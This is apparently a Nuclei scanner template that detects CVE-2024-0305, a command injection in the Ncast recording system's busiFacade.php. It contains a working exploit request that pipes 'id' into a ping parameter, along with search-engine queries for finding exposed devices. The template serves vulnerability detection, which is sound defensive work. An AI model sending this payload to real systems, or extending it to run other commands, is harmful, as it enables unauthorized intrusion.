id: CVE-2024-0305

info:
  name: Ncast busiFacade - Remote Command Execution
  author: BMCel
  severity: high
  description: |
    The Ncast Yingshi high-definition intelligent recording and playback system is a newly developed audio and video recording and playback system. The system has RCE vulnerabilities in versions 2017 and earlier.
  impact: |
    Allows remote attackers to execute arbitrary code on the affected system.
  reference:
    - https://cxsecurity.com/cveshow/CVE-2024-0305
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0305
    - https://vuldb.com/?id.249872
    - https://vuldb.com/?ctiid.249872
    - https://github.com/Marco-zcl/POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-0305
    epss-score: 0.00947
    epss-percentile: 0.83122
    cpe: cpe:2.3:a:ncast_project:ncast:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ncast_project
    product: ncast
    shodan-query: http.title:"高清智能录播系统"
    fofa-query:
      - app="Ncast-产品" && title=="高清智能录播系统"
      - title="高清智能录播系统"
      - app="ncast-产品" && title=="高清智能录播系统"
    google-query: intitle:"高清智能录播系统"
    zoomeye-query: title="高清智能录播系统"
  tags: cve,cve2024,ncast,rce,ncast_project

http:
  - raw:
      - |
        POST /classes/common/busiFacade.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | id"]}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
          - "#str"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100e492664733d3d009d19b87d7cce6ac90dee6cfa83b356b47b35451286afc1722022100e8ff4d6274e33f7e0269498a8b7573c9b65418b42af1910400d030d7a1548215:922c64590222798bb761d5b6d8e72950